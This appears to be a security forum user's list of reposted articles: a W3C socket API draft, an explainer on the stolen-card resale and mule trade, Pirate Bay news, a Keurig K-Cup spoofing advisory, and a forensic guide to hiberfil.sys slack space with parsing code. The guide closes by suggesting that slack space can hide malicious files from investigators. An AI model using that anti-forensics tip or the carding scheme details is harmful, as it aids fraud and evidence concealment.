Everything posted by Nytro
-
TCP and UDP Socket API
W3C Working Draft 02 December 2014

This version: TCP and UDP Socket API
Latest version: TCP and UDP Socket API
Previous version: Raw Socket API
Latest editor's draft: TCP and UDP Socket API
Editor: Claes Nilsson, Sony Mobile
Repository: We are on Github. File a bug. Commit history.

Copyright © 2014 W3C® (MIT, ERCIM, Keio, Beihang), All Rights Reserved. W3C liability, trademark and document use rules apply.

Abstract

This API provides interfaces to raw UDP sockets, TCP Client sockets and TCP Server sockets.

Status of This Document

This section describes the status of this document at the time of its publication. Other documents may supersede this document. A list of current W3C publications and the latest revision of this technical report can be found in the W3C technical reports index at All Standards and Drafts - W3C.

The short name for this API has been changed from raw-sockets to tcp-udp-sockets as a more accurate description of its scope.

This document was published by the System Applications Working Group as an updated Public Working Draft. This document is intended to become a W3C Recommendation. If you wish to make comments regarding this document, please send them to public-sysapps@w3.org (subscribe, archives). All feedback is welcome.

Publication as a Working Draft does not imply endorsement by the W3C Membership. This is a draft document and may be updated, replaced or obsoleted by other documents at any time. It is inappropriate to cite this document as other than work in progress.

This document was produced by a group operating under the 5 February 2004 W3C Patent Policy. W3C maintains a public list of any patent disclosures made in connection with the deliverables of the group; that page also includes instructions for disclosing a patent. An individual who has actual knowledge of a patent which the individual believes contains Essential Claim(s) must disclose the information in accordance with section 6 of the W3C Patent Policy.
This document is governed by the 14 October 2005 W3C Process Document.

Note: This specification is based on the Streams API [STREAMS]. Note that the Streams API is work in progress and any changes made to Streams may impact the TCP and UDP Socket API specification. However, it is the editor's ambition to continuously update the TCP and UDP Socket API specification to be aligned with the latest version of the Streams API.

Note: This is a note on error handling. When using promises, rejection reasons should always be instances of the ECMAScript Error type, such as DOMException or the built-in ECMAScript error types. See Promise rejection reasons. In the TCP and UDP Socket API the error names defined in WebIDL Exceptions are used. If additional error names are needed, an update to the Github WebIDL should be requested through a Pull Request.

Note: This is a note on the data types TCP and UDP use to send and receive. In the previous version of this API the send() method accepted the following data types for the data to send: DOMString, Blob, ArrayBuffer or ArrayBufferView. This was aligned with the send() method for Web Sockets. In this Streams API based version only ArrayBuffer is accepted as the type for data to send. The reason is that encoding issues in a Streams based API should instead be handled by a transform stream.

Table of Contents

1. Introduction
2. Conformance
3. Terminology
4. Security and privacy considerations
5. Interface UDPSocket
   5.1 Attributes
   5.2 Methods
6. Interface TCPSocket
   6.1 Attributes
   6.2 Methods
7. Interface TCPServerSocket
   7.1 Attributes
   7.2 Methods
8. Dictionary UDPMessage
   8.1 Dictionary UDPMessage Members
9. Dictionary UDPOptions
   9.1 Dictionary UDPOptions Members
10. Dictionary TCPOptions
    10.1 Dictionary TCPOptions Members
11. Dictionary TCPServerOptions
    11.1 Dictionary TCPServerOptions Members
12. Enums
    12.1 SocketReadyState
A. Acknowledgements
B. References
   B.1 Normative references

Sursa: TCP and UDP Socket API
-
What Happens to Stolen Credit Card Data?
Posted on December 10, 2014 by Scott Aurnou

By Scott Aurnou

Reports of high profile data breaches have been hard to miss over the past year. Most recently, it was a breach involving 56 million customers’ personal and credit card information at Home Depot over a five-month period. This is just the latest volley in a wave of sophisticated high profile electronic thefts including Target, Neiman Marcus, Michaels, P.F. Chang’s and Supervalu.

Much like the other attacks, the suspected culprit in the Home Depot data breach is a type of malware called a RAM scraper that effectively steals card data while it’s briefly unencrypted at the point of sale (POS) in order to authorize a given transaction. Reports of this type of attack have become increasingly common in the months since the Target breach. Whether it’s a RAM scraper or an “older” threat like a physical skimmer placed directly on a POS machine used to swipe a credit or debit card, a phishing attack or simply storing customers’ card information insecurely, the result is the same: credit card data for millions of people winds up in the hands of criminals eager to sell it for profit. How does that process unfold? And how can you – or people you know – get sucked into it?

The Basic Process:

The journey from the initial credit card data theft to the fraudulent use of that data to steal goods from other retailers involves multiple layers of transactions. The actual thief taking the card numbers from the victim business’ POS or database doesn’t use them him or herself.

First, a hacker – or a team of them – steals the credit card data electronically. Most of these schemes begin in Russia or other parts of Eastern Europe, and much of what you might call the “carding trade” is centered there.

Next, brokers (also referred to as “re-sellers”) buy the stolen card numbers and related information in bulk and trade them in online carding forums. A hacker may also sell the card data directly to keep more of the profits, though that’s riskier and more time-consuming than using a broker. These exchanges are found on the dark net (aka the dark web). That’s a part of the Internet you won’t find through Google, where all manner of illegal and unsavory things can take place.

Online prices vary depending on:

• The type of card,
• Credit limit (if known),
• How much additional data is available (CVV codes from the backs of cards and associated zip codes make stolen cards more valuable),
• The card owner’s geographic location (a fake card used in the vicinity of the legitimate card holder is less likely to raise suspicion), and
• How recently the cards began appearing in the carding forums (i.e., likelihood of card cancellation).

Prices for the individual cards have come down significantly in the past few years due to the sheer number of records available, though brokers can still do quite well from bulk sales of card data. Despite being on the dark web, many of the brokers conduct themselves like regular online businesses and will provide replacements or the equivalent of store credit if cards purchased from them don’t work.

The people who buy the card data from the brokers are called “carders.” Once the carders have the stolen card data, there are (at least) two distinct variations on the scam:

1) Physical, in-store purchases using fake credit cards.
2) Stolen card numbers used to charge pre-paid credit cards that are, in turn, used to purchase store-specific gift cards (which are less suspicious than general gift cards), with the purchases made online.

Variant 1 (“Mystery Shopper”):

This variation starts with carders printing up the fake credit cards for use in stores. Once they have the stolen card data, the equipment needed to make the fake cards isn’t that expensive. The carder then usually works with one or more recruiters to find people to use the fake cards (though a carder may do the recruiting him or herself). The enticement to get people to use the fake cards will generally be in the form of email spam and ads on Craigslist or similar sites offering easy money to be a “mystery shopper” or “secret shopper” as part of a “marketing study” or some other semi-plausible justification. Not surprisingly, the items purchased tend to have high resale value.

After the physical purchases are made, the “mystery shopper” can either send the items to the recruiter/carder (generally via a secure drop site like a vacant office) or directly to someone who has “purchased” an item via an auction site in response to a posting from the recruiter/carder. If sent straight to the carder, he or she then auctions the items directly on eBay, Craigslist or an underground forum on the dark web.

The people who actually make the purchases with the fake cards may have no clue what they’re involved in (though sometimes they’re active participants in the scheme or simply low-level criminals looking to use the cards for themselves). They are effectively the “drug mules” of the credit card scam, taking the most risk and getting paid the least.

You’ve probably seen one step retailers take to try to stop in-person card fraud. On a counterfeit credit card, the numbers on the magnetic strip and the front of the card generally don’t match – it’s too expensive to create individual fakes. Some retailers have their personnel type the last four digits on the physical card into the register after the card is swiped. If the numbers don’t match, the card is rejected as a fake.

Variant 2 (“Re-shipping”):

Rather than making physical cards, in this variation carders use the stolen card data to purchase pre-paid credit cards that are then used to buy store-specific gift cards (Amazon, Best Buy, etc.). Like the “mystery shopper” scheme, recruiters typically use ads and spam emails to entice people, though this time it’s people (especially in the U.S.) seeing “work from home” promises. Sometimes the recruiters will employ a more personalized approach, even going so far as to start a fake “relationship” with the intended target.

Then – wait, there’s more – the gift cards are used to purchase items online, and those items are shipped to the people responding to the ads, spam or “relationship” overtures. That’s where the “work from home” angle comes in. The people initially receiving the packages directly from an online retailer are called “re-shippers.” People in the United States are used because U.S.-based addresses raise fewer red flags with the retailers. Like the “mystery shoppers,” the re-shippers are the drug mules here (and they are sometimes referred to as “money mules” or “shipping mules”). And, as with the “mystery shopper” scheme, re-shippers can either send the items to the recruiter/carder or directly to someone who has “purchased” the item through an auction site.

While this may sound a little convoluted, the shell game-like nature of using one card to buy another and then another makes it more difficult for stores to catch on to this scheme before the purchase has already been made and shipped out. After that, it’s generally too late.

Sursa: What Happens to Stolen Credit Card Data? | The Security Advocate
-
https://rstforums.com/forum/92665-tapatalk-xss.rst
-
Pirate Bay cofounder Peter Sunde says he’s happy to see site gone
"The site was ugly, full of bugs, old code and old design."
by Cyrus Farivar - Dec 10 2014, 8:17pm

One of the founders of The Pirate Bay (TPB) has bid good riddance to the site that he helped build a decade ago, which may have been definitively shuttered this week. In a Tuesday blog post, Peter Sunde, who was released last month after having served five months in a Swedish prison for his role in aiding copyright infringement via The Pirate Bay, wrote:

TPB has become an institution that people just expected to be there. No one willing to take the technology further. The site was ugly, full of bugs, old code and old design. It never changed except for one thing – the ads. More and more ads was filling the site, and somehow when it felt unimaginable to make these ads more distasteful they somehow ended up even worse.

The original deal with TPB was to close it down on its tenth birthday. Instead, on that birthday, there was a party in its "honour" in Stockholm. It was sponsored by some sexist company that sent young girls, dressed in almost no clothes, to hand out freebies to potential customers. There was a ticket price to get in, automatically excluding people with no money. The party had a set lineup with artists, scenes and so on, instead of just asking the people coming to bring the content. Everything went against the ideals that I worked for during my time as part of TPB.

"The original team handed it over to, well, less soul-ish people to say the least," he concluded. "From the outside I felt that no one had any interest in helping the community if it didn’t eventually pay out in cash."

More than five years ago, Sunde told Ars that in 2006, The Pirate Bay ownership was transferred to an unnamed organization, which then transferred ownership to a shady shell corporation called Reservella.
" can't reveal any details I know about Reservella because of [non-disclosure agreements], not even who's the owners," he said at the time. Sursa: Pirate Bay cofounder Peter Sunde says he’s happy to see site gone | Ars Technica
-
Keurig 2.0 Genuine K-Cup Spoofing Vulnerability
From: Kenneth Buckler <kenneth.buckler () gmail com>
Date: Tue, 9 Dec 2014 13:04:20 -0500

*Overview*
The Keurig 2.0 Coffee Maker contains a vulnerability in which the authenticity of coffee pods, known as K-Cups, is checked using weak verification methods, which are subject to a spoofing attack through re-use of a previously verified K-Cup.

*Impact*
CVSS Base Score: 4.9
Impact Subscore: 6.9
Exploitability Subscore: 3.9
Access Vector: Local
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: Complete
Availability Impact: None

*Vulnerable Versions*
Keurig 2.0 Coffee Maker

*Technical Details*
The Keurig 2.0 is designed to only use genuine Keurig-approved coffee K-Cups. However, a flaw in the verification method allows an attacker to use unauthorized K-Cups. The Keurig 2.0 does not verify that the K-Cup foil lid used for verification has not been re-used.

Step 1: Attacker uses a genuine K-Cup in the Keurig machine to brew coffee or hot chocolate.
Step 2: After brewing is complete, attacker removes the genuine K-Cup from the Keurig and uses a knife or scissors to carefully remove the full foil lid from the K-Cup, taking care to keep the full edges intact. Attacker keeps this lid for use in the attack.
Step 3: Attacker inserts a non-genuine K-Cup in the Keurig and closes the lid. Attacker should receive an "oops" error message stating that the K-Cup is not genuine.
Step 4: Attacker opens the Keurig, leaving the non-genuine K-Cup in place, and carefully places the previously saved genuine K-Cup lid on top of the non-genuine K-Cup, lining up the puncture hole to keep the lid in place.
Step 5: Attacker closes the Keurig and is able to brew coffee using the non-genuine K-Cup.
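As a sanity check on the advisory's scoring, the quoted subscores and base score can be reproduced from the CVSS 2.0 base equation. A minimal sketch — the metric weights (Local = 0.395, Low = 0.71, None = 0.704, Complete = 0.660, etc.) come from the CVSS v2 specification, not from the advisory itself:

```python
# Reproduce the advisory's CVSS 2.0 figures for AV:L/AC:L/Au:N/C:N/I:C/A:N.
# Weights per the CVSS v2 specification.

def cvss2_base(av, ac, au, c, i, a):
    impact = 10.41 * (1 - (1 - c) * (1 - i) * (1 - a))
    exploitability = 20 * av * ac * au
    f = 0 if impact == 0 else 1.176      # f(Impact) factor from the spec
    score = ((0.6 * impact) + (0.4 * exploitability) - 1.5) * f
    return round(score, 1), round(impact, 1), round(exploitability, 1)

# AV:Local=0.395, AC:Low=0.71, Au:None=0.704, C:None=0.0, I:Complete=0.660, A:None=0.0
base, impact, expl = cvss2_base(0.395, 0.71, 0.704, 0.0, 0.660, 0.0)
print(base, impact, expl)   # 4.9 6.9 3.9
```

The output matches the advisory: base 4.9, impact subscore 6.9, exploitability subscore 3.9.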
Since no fix is currently available, owners of Keurig 2.0 systems may wish to take additional steps to secure the device, such as keeping the device in a locked cabinet, or using a cable lock to prevent the device from being plugged in when not being used by an authorized user. Please note that a proof of concept is already available online.

*Credit:*
Proof of concept at KeurigHack.com
Vulnerability writeup by Ken Buckler, Caffeine Security

Sursa: Full Disclosure: Keurig 2.0 Genuine K-Cup Spoofing Vulnerability
-
Parsing the hiberfil.sys, searching for slack space

Implementing functionality that is already available in an existing tool is something that has always taught me a lot, so I keep on doing it whenever I encounter something I want to fully understand. In this case it concerns the ‘hiberfil.sys’ file on Windows. As usual I first stumbled upon the issue and started writing scripts, only to later find out someone had written a nice article about it, which you can read here (1). For the sake of completeness I’m going to repeat some of the information in that article and hopefully expand upon it; it’d be nice if I could use this entry as a reference page in the future for when I stumble upon hibernation files again.

Our goal for today is going to be to answer the following question: what’s a hiberfil.sys file, does it have slack space, and if so, how do we find and analyze it?

That question will hopefully be answered in the following paragraphs; we are going to look at the hibernation process, the hibernation file, its file format structure, how to interpret it and finally how to analyze the found slack space. As usual you can skip the post and go directly to the code.

Hibernation process

When you put your computer to ‘sleep’ there are actually several ways in which the operating system can do it, one of them being hibernation. The hibernation process puts the contents of your memory into the hiberfil.sys file so that the state of all your running applications is preserved. By default, when you enable hibernation the hiberfil.sys is created and filled with zeros. To enable hibernation you can run the following command in an elevated command shell:

powercfg.exe -H on

If you want to also control the size you can do:

powercfg.exe -H -Size 100

An interesting fact to note is that Windows 7 sets the size of the hibernation file to 75% of your memory size by default. According to Microsoft documentation (2) this means that the hibernation process could fail if it’s not able to compress the memory contents to fit in the hibernation file. This of course is useful information, since it indicates that the contents of the hibernation file are compressed, which usually makes basic analysis like ‘strings’ pretty useless. (If you use strings, always go for ‘strings -a <inputfile>’; read this post if you are wondering why.)

The hibernation file usually resides in the root directory of the system drive, but that location isn’t fixed. If an administrator wants to change the location, he can do so by editing the following registry key as explained by this (3) msdn article:

Key Name: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\
Value Name: PagingFiles
Type: REG_MULTI_SZ
Data: C:\pagefile.sys 150 500

In the Data field, change the path and file name of the pagefile, along with the minimum and maximum file size values (in megabytes).

So if you are performing an incident response or forensic investigation, make sure you check this registry key before you draw any conclusions if the hiberfil.sys file is absent from its default location. The same goes for creating memory images using hibernation: make sure you get 100% of it and write it to a location which doesn’t destroy evidence, or where the evidence has already been collected.

Where does the slack space come from, you might ask? That’s an interesting question, since you would assume that each time the computer goes into hibernation mode it would create a new hiberfil.sys file – but it doesn’t. Instead it overwrites the current file with the contents it wants to save. This is what causes slack space: if the new data is smaller than the data already in the file, the data at the end of the file will still be present even though it’s not referenced by the new headers written to the file.
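The overwrite-in-place behaviour described above is easy to demonstrate with ordinary files — a minimal sketch, using a throwaway file rather than an actual hiberfil.sys:

```python
# Demonstrate how overwriting a file in place (without truncating)
# leaves old trailing bytes behind -- the same mechanism that creates
# hiberfil.sys slack space.
import os
import tempfile

path = os.path.join(tempfile.mkdtemp(), "hiber.bin")

with open(path, "wb") as f:      # first "hibernation": a large write
    f.write(b"A" * 4096)

with open(path, "r+b") as f:     # second "hibernation": a smaller write,
    f.write(b"B" * 1024)         # opened r+b with no truncate()

data = open(path, "rb").read()
print(len(data))                 # still 4096 -- the file did not shrink
print(data[1024:1032])           # b'AAAAAAAA' -- old data, i.e. "slack"
```

The second write only replaces the first 1024 bytes; the remaining 3072 bytes of old data survive unreferenced, exactly like the unreferenced Xpress blocks at the end of a rewritten hibernation file.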
From a forensic standpoint that’s pretty interesting, since the unreferenced but available data might contain important information to help the investigation along. If you are working with tools that automatically import, parse or analyse the hiberfil.sys file, you should check / ask / test how they handle slack space. In the best case they will inform you about the slack space and try to recover the information; in a less ideal scenario they will inform you that there is slack space but that they are not able to handle the data; and in the worst case they will just silently ignore that data and tell you the hibernation file has been processed successfully.

Hibernation file structure

Now that we know that slack space exists, how do we find and process it? First of all we should start with identifying the file format to be able to parse it, which unfortunately isn’t available from Microsoft directly. Luckily for us we don’t need to reverse it (yet?) since there are pretty smart people out there who have already done so. You could read this or this or this to get some very good information about the file format. Let’s look at the parts that are relevant for our purpose of retrieving and analyzing the hibernation slack space. The general overview of the file format is as follows:

[Figure: Hibernation File Format (9)]

As you can see in the image above, the file format seems reasonably easy to parse if we have the definition of all the headers. The most important headers for us are the “Hibernation File Header”, which starts at page zero; the “Memory Table” header, which contains a pointer to the next table and the number of Xpress blocks; and the “Xpress image” header, which contains the actual memory data. The last two headers create the chain we want to follow to be able to distinguish between referenced Xpress blocks and blocks which are just lingering around in slack space. The thing to keep in mind is that even though the “Hibernation File Header” contains a lot of interesting information for building a robust tool, it might not be present when we recover a hibernation file. The reason for this is that when Windows resumes from hibernation the first page is zeroed. Luckily it isn’t really needed if you just assume a few constants, like the page size being 4096 bytes, and find the first Xpress block with a bit of searching around.

Let’s have a look at the headers we have been talking about:

```c
typedef struct {
    ULONG         Signature;
    ULONG         Version;
    ULONG         CheckSum;
    ULONG         LengthSelf;
    ULONG         PageSelf;
    UINT32        PageSize;
    ULONG64       SystemTime;
    ULONG64       InterruptTime;
    DWORD         FeatureFlags;
    DWORD         HiberFlags;
    ULONG         NoHiberPtes;
    ULONG         HiberVa;
    ULONG64       HiberPte;
    ULONG         NoFreePages;
    ULONG         FreeMapCheck;
    ULONG         WakeCheck;
    UINT32        TotalPages;
    ULONG         FirstTablePage;
    ULONG         LastFilePage;
    PO_HIBER_PREF PerfInfo;
    ULONG         NoBootLoaderLogPages;
    ULONG         BootLoaderLogPages[8];
    ULONG         TotalPhysicalMemoryCount;
} PO_MEMORY_IMAGE, *PPO_MEMORY_IMAGE;
```

The FirstTablePage member is the most important one for us, since it contains a pointer to the first memory table. Then again, knowing that the first page might be wiped out, do we really want to parse it when it’s available? Let’s look at the memory table structure:

```c
struct MEMORY_TABLE {
    DWORD  PointerSystemTable;
    UINT32 NextTablePage;
    DWORD  CheckSum;
    UINT32 EntryCount;
    MEMORY_TABLE_ENTRY MemoryTableEntries[EntryCount];
};
```

That’s neat: as expected it contains the NextTablePage member, which points to the next memory table. Directly following the memory table we’ll find the Xpress blocks, which have the following header:

```c
struct IMAGE_XPRESS_HEADER {
    CHAR   Signature[8] = 81h, 81h, "xpress";
    BYTE   UncompressedPages = 15;
    UINT32 CompressedSize;
    BYTE   Reserved[19] = 0;
};
```

It seems this header contains the missing puzzle pieces, since it tells us how big each Xpress block is.
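Given the IMAGE_XPRESS_HEADER layout above, the header can be unpacked with Python's struct module. A sketch under the assumption that the fields are packed little-endian exactly as listed (signature at offset 0, UncompressedPages at 8, CompressedSize at 9) — not validated against a real hiberfil.sys:

```python
# Unpack the reversed IMAGE_XPRESS_HEADER layout (32 bytes total:
# 8-byte signature + 1-byte page count + 4-byte size + 19 reserved).
# Offsets are an assumption based on the struct listing above.
import struct

XPRESS_SIG = b"\x81\x81xpress"

def parse_xpress_header(buf):
    if buf[0:8] != XPRESS_SIG:
        raise ValueError("not an Xpress block")
    uncompressed_pages = buf[8]
    (compressed_size,) = struct.unpack_from("<I", buf, 9)
    return uncompressed_pages, compressed_size

# Build a fake header to exercise the parser.
hdr = XPRESS_SIG + bytes([15]) + struct.pack("<I", 0x3FF) + b"\x00" * 19
print(parse_xpress_header(hdr))   # (15, 1023)
```

In a real parser you would mmap the hibernation file and call this on each candidate offset found by scanning for the signature.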
So if you followed along, here is the big picture of how it all fits together to be parsed, and how to discover whether there is any slack space and if so how much:

1. Find the first MemoryTable
2. Follow the pointers until you find the last one
3. Follow all the Xpress blocks until the last one
4. Calculate the distance from the end of the last block to the end of the file
5. Slack space found

There are a few caveats that we need to be aware of (you know these if you already read the references):

- Every OS version might change the structures and thus their size
- Everything is page aligned
- Every memory table entry should correspond to an Xpress block
- To get the actual compressed size, calculate CompressedSize / 4 + 1 and round it up to a multiple of 8

Parsing and interpreting the hibernation file

The theory sounds pretty straightforward, right? The practice however actually made me waste some hours. For one, I was assuming the “Hibernation File Header” to be the same across all operating systems – stupid, I know. I just didn’t realize it until I was brainstorming with Mitchel Sahertian about why the pointers were not pointing at the correct offsets. This taught me that when you are writing proof of concept code you should parse the entire structure, not just reference the structure members you are interested in: parsing the entire structure gives you more context and the ability to quickly spot that a lot of members contain garbage data. When you are just directly referencing a single member, like I was doing, you lose that context and you only get to see one pointer, which could virtually be anything. Even after learning this lesson, I still decided to implement the script by just parsing the minimum needed data, even though I used full structures while debugging the code.
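The size rule from the caveat list above (CompressedSize / 4 + 1, rounded up to a multiple of 8) can be written out directly. A sketch implementing the rule exactly as the article states it — treat it as the article's convention, not an authoritative spec:

```python
def xpress_actual_size(compressed_size_field):
    """Actual on-disk size of an Xpress block per the rule above:
    CompressedSize / 4 + 1, rounded up to a multiple of 8."""
    size = compressed_size_field // 4 + 1
    return (size + 7) & ~7           # round up to the next multiple of 8

print(xpress_actual_size(0x3FF))     # 1023 // 4 + 1 = 256, already aligned -> 256
print(xpress_actual_size(100))       # 100 // 4 + 1 = 26, rounded up -> 32
```

This is the number you seek() forward by to land on the next Xpress block when walking the chain.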
The most important snippets of the script are highlighted hereafter. The script probably contains bugs, although in the few tests I’ve performed it seems to work fine.

Finding the first MemoryTable: first we search for an Xpress block and then we subtract a full page from it.

```python
firstxpressblock = fmm.find(XPRESS_SIG)
print "Found Xpress block @ 0x%x" % firstxpressblock
firstmemtableoffset = firstxpressblock - PAGE_SIZE
```

Finding the pointer to the next MemoryTable in a dynamic way – we want to avoid reversing this structure for every new operating system version or service pack. We start at the beginning of the MemoryTable and force-interpret every four bytes as a pointer, then we check the pointer destination. The pointer destination is checked by verifying that an Xpress block follows it immediately; if so, it’s valid.

```python
def verify_memorytable_offset(offset):
    """
    Verify the table pointer to be valid
    valid table pointer should have an Xpress block on the next page
    """
    fmm.seek(offset+PAGE_SIZE)
    correct = False
    if fmm.read(8) == XPRESS_SIG:
        correct = True
    fmm.seek(offset)
    return correct

# could go horribly wrong, seems to work though
def find_memorytable_nexttable_offset(data):
    """
    Dynamically find the NextTablePage pointer
    Verification based on verify_memorytable_offset function
    """
    for i in range(len(data)):
        toffset = unpack('<I',data[i:(i+4)])[0]*PAGE_SIZE
        if verify_memorytable_offset(toffset):
            return i
```

After we find the last MemoryTable, we just have to walk all the Xpress blocks until the last one; from its end until the end of the file is the slack space we are after:

```python
while True:
    xsize = xpressblock_size(fmm,nxpress)
    fmm.seek(xsize,1)
    xh = fmm.read(8)
    if xh != XPRESS_SIG:
        break
    fmm.seek(-8,1)
    if VERBOSE:
        print "Xpress block @ 0x%x" % nxpress
    nxpress = fmm.tell()
print "Last Xpress block @ 0x%x" % nxpress
```

Analyzing the found hibernation slack space

So after all this, how do we even know this slack space is really there, and can we even extract something useful from it? First of all let’s compare our output to that of volatility; after all it’s the de facto – and in my opinion best – memory analysis tool out there. One of the things you can do with volatility, for example, is convert the hibernation file into a raw memory file; volatility doesn’t support direct hibernation file analysis. Before converting it, however, I added two debug lines to the file ‘volatility/plugins/addrspaces/hibernate.py’.

Printing the memory table offset:

```python
NextTable = MemoryArray.MemArrayLink.NextTable.v()
print "memtableoff %x" % NextTable
# This entry count (EntryCount) should probably be calculated
```

Printing the Xpress block offset:

```python
XpressHeader = obj.Object("_IMAGE_XPRESS_HEADER", XpressHeaderOffset, self.base)
XpressBlockSize = self.get_xpress_block_size(XpressHeader)
print "xpressoff %x" % XpressHeaderOffset
return XpressHeader, XpressBlockSize
```

With this small modification I’m able to compare the output of my script to the output of volatility.

Volatility output:

./vol.py -f ~/p/find_hib_slack/hibfiles/a.sys --profile=Win7SP0x86 imagecopy -O ~/p/find_hib_slack/hibfiles/raw.a.img
[...]
memtableoff 10146
xpressoff 10147000
xpressoff 1014f770
xpressoff 101589f0
xpressoff 10160240
xpressoff 10166a98
xpressoff 1016c7a8
xpressoff 10172448
xpressoff 10179b60
xpressoff 1017ff50
xpressoff 10181af8
xpressoff 10181d58
xpressoff 10183790
xpressoff 101877e0
xpressoff 1018c290
xpressoff 10192270
xpressoff 10195890
xpressoff 1019b680
xpressoff 101a0d50
xpressoff 101a5258
xpressoff 101a8608
xpressoff 101aa3e8
xpressoff 101adc70
xpressoff 101b2de0

That looks pretty clear: the last memory table is at offset 0x10146 and the last Xpress block is at offset 0x101b2de0.

My script:

./find_hib_slack.py hibfiles/a.sys
Last MemoryTable @ 0x10146000
Xpress block @ 0x10147000
Xpress block @ 0x1014f770
Xpress block @ 0x101589f0
Xpress block @ 0x10160240
Xpress block @ 0x10166a98
Xpress block @ 0x1016c7a8
Xpress block @ 0x10172448
Xpress block @ 0x10179b60
Xpress block @ 0x1017ff50
Xpress block @ 0x10181af8
Xpress block @ 0x10181d58
Xpress block @ 0x10183790
Xpress block @ 0x101877e0
Xpress block @ 0x1018c290
Xpress block @ 0x10192270
Xpress block @ 0x10195890
Xpress block @ 0x1019b680
Xpress block @ 0x101a0d50
Xpress block @ 0x101a5258
Xpress block @ 0x101a8608
Xpress block @ 0x101aa3e8
Xpress block @ 0x101adc70
Last Xpress block @ 0x101b2de0
Start of slack space @ 270223752
Total file size 1073209344
Slackspace size 765 megs

At least we know that the parsing seems to be OK, since our last MemoryTable offset and our last Xpress offset match the ones from volatility. We can also see that the end of the last Xpress block is way before the end of the file. This indicates that the space in between might contain some interesting data. From a memory forensics perspective it’s logical that volatility doesn’t parse this, since the chances of being able to extract any meaningful structured data from it are reduced in comparison with a normal memory image or hibernation file.

You can use the output to carve out the slack space with dd if you want to analyze it further, for example like this:

dd if=<inputfile> of=<slack.img> bs=1 skip=<start_of_slackspace>

The thing is, like all slack space it can contain virtually anything. If you are really lucky you’ll find nice new MemoryTables and Xpress blocks. If you are less lucky you’ll only find partial Xpress blocks. For now I’ve opted for medium optimism and assumed we’ll at least be able to find full Xpress blocks.
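The dd one-liner above works but copies one byte at a time (bs=1), which is slow on a gigabyte-sized hibernation file. A Python sketch of the same carve that streams in large chunks — the file names and the 270223752 offset are just the placeholders and example values from the output above:

```python
# Carve everything from the slack-space offset to end-of-file,
# equivalent to: dd if=src of=dst bs=1 skip=start_offset
import os
import shutil
import tempfile

def carve_slack(src, dst, start_offset):
    with open(src, "rb") as fin, open(dst, "wb") as fout:
        fin.seek(start_offset)
        shutil.copyfileobj(fin, fout)   # streams in big chunks, not byte-by-byte

# Tiny self-test on a throwaway file; a real run would look like:
#   carve_slack("hibfiles/a.sys", "slack.img", 270223752)
d = tempfile.mkdtemp()
src, dst = os.path.join(d, "a.sys"), os.path.join(d, "slack.img")
with open(src, "wb") as f:
    f.write(b"\x00" * 100 + b"SLACKDATA")
carve_slack(src, dst, 100)
print(open(dst, "rb").read())   # b'SLACKDATA'
```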
So I wrote another script which you can use to extract and decompress blocks from a blob of data and write them to a file. After this you can try your luck with strings, for example, or the volatility plugins yarascan or psscan. Here is some example output:

./bulk_xpress_decompress.py hibfiles/a.sys 270223752
Advancing to offset 270223752
Xpress block @ 0x101b65c0 size: 20824
Xpress block @ 0x101bb718 size: 17760
Xpress block @ 0x101bfc78 size: 17240
Xpress block @ 0x101c3fd0 size: 20424
Xpress block @ 0x101c8f98 size: 21072
Xpress block @ 0x101ce1e8 size: 16712

The script also writes all the decompressed output to a file called ‘decompressed.slack’. I use the decompression file from volatility; hope I didn’t mess up any license requirements, since I just included it in its entirety.

Conclusion

Sometimes you really have to dive into a file format to fully understand it. It won’t always end in glorious victory, but you’ll learn a lot during the development of your own script. Also, slack space is a nice place to store your malicious file. I’m taking a guess here, but I assume that if you enlarge the hibernation file, Windows will be fine with it. As long as the incident response or forensic investigator doesn’t look at it, you’ll get away without your stash being discovered, due to the fact that most tools ignore the slack space.
References

- SANS Digital Forensics and Incident Response Blog | Hibernation Slack: Unallocated Data from the Deep Past | SANS Institute
- http://download.microsoft.com/download/7/E/7/7E7662CF-CBEA-470B-A97E-CE7CE0D98DC2/HiberFootprint.docx
- http://msdn.microsoft.com/en-us/library/ms912851(v=winembedded.5).aspx (Change hibernation file location)
- http://msdn.microsoft.com/en-us/library/windows/desktop/aa373229(v=vs.85).aspx (System power states)
- lcamtuf's blog: PSA: don't run 'strings' on untrusted files (CVE-2014-8485)
- MoonSols Developer Network - MSDN
- http://www.blackhat.com/presentations/bh-usa-08/Suiche/BH_US_08_Suiche_Windows_hibernation.pdf
- http://sandman.msuiche.net/docs/SandMan_Project.pdf
- http://stoned-vienna.com/downloads/Hibernation%20File%20Attack/Hibernation%20File%20Format.pdf
- Hibernation File Attack - Peter Kleissner
- https://github.com/volatilityfoundation

Sursa: Parsing the hiberfil.sys, searching for slack space | DiabloHorn
-
[h=1]Pirate site The Pirate Bay goes down, then sails for Costa Rica[/h]

Mark Hachman @markhachman

The original home of The Pirate Bay, probably the Web’s highest-profile site for copyrighted movies, music, and software, is no longer online. However, at least a placeholder is alive on a Costa Rican domain—though not much more than that.

TorrentFreak first noted the outage. The site’s reporters said that they had received a statement from Paul Pintér, Sweden's police national coordinator for IP enforcement, claiming that there had been a raid on a server room owned by The Pirate Bay at a site in Stockholm.

According to earlier reporting from the site, however, The Pirate Bay had moved to a cloud-based infrastructure that used 21 “virtual servers” controlled by a load balancer. The idea, according to The Pirate Bay, was that the distributed architecture would make it “raid-proof,” as the site could simply be moved from domain to domain. Whether that’s the case or not, time will tell.

The Pirate Bay’s Twitter feed has gone dark since Dec. 3. Related sites, such as Suprbay.org, are also offline, as are Bayimg.com and Pastebay.net. The mobile version of The Pirate Bay, themobilebay.org, also timed out when PCWorld tried to access it.

Want to learn more about the history of The Pirate Bay? Check out the timeline that TechHive constructed last year.

Why this matters: The Pirate Bay has served as a rallying point both for those who are too cheap to pay for electronic media and for more civic-minded folk who used the site as a form of protest against increasingly draconian copyright laws. The Pirate Bay has always touted itself as the “most resilient” pirate site on the Web; we’ll find out exactly how resilient over the course of the next few days, it seems.

Sursa: Pirate site The Pirate Bay goes down, then sails for Costa Rica | PCWorld

http://thepiratebay.cr/
-
Swedish police raid The Pirate Bay and knock the site offline
Nytro replied to Nytro's topic in Stiri securitate
They moved pretty fast: https://thepiratebay.cr/ -
Swedish police raid The Pirate Bay and knock the site offline

by Richard Lawler | @Rjcc | 1 hr ago

